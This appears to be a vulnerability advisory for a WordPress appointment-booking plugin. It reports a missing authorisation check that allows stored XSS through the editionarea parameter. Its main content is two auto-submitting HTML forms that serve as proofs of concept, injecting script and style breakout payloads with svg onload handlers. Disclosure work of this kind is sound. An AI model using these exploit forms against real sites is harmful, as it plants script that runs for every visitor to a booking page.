Lack of authorisation check in the cpabc_appointments_save_edition() function can lead to stored XSS via the editionarea parameter when cfwpp_edit is set to ‘js’ or ‘css’
<body onload="document.forms[0].submit();">
<form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="CP_ABC_post_edition" value=""/>
<input type="hidden" name="cfwpp_edit" value="js"/>
<input type="hidden" name="editionarea" value="</script><svg/onload=alert(/XSS-JS/)>"/>
</form>
</body>
<body onload="document.forms[0].submit();">
<form action="https://<BLOG>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="CP_ABC_post_edition" value=""/>
<input type="hidden" name="cfwpp_edit" value="css"/>
<input type="hidden" name="editionarea" value="</style><svg/onload=alert(/XSS-CSS/)>"/>
</form>
</body>
The payload will be triggered in all pages with a booking form.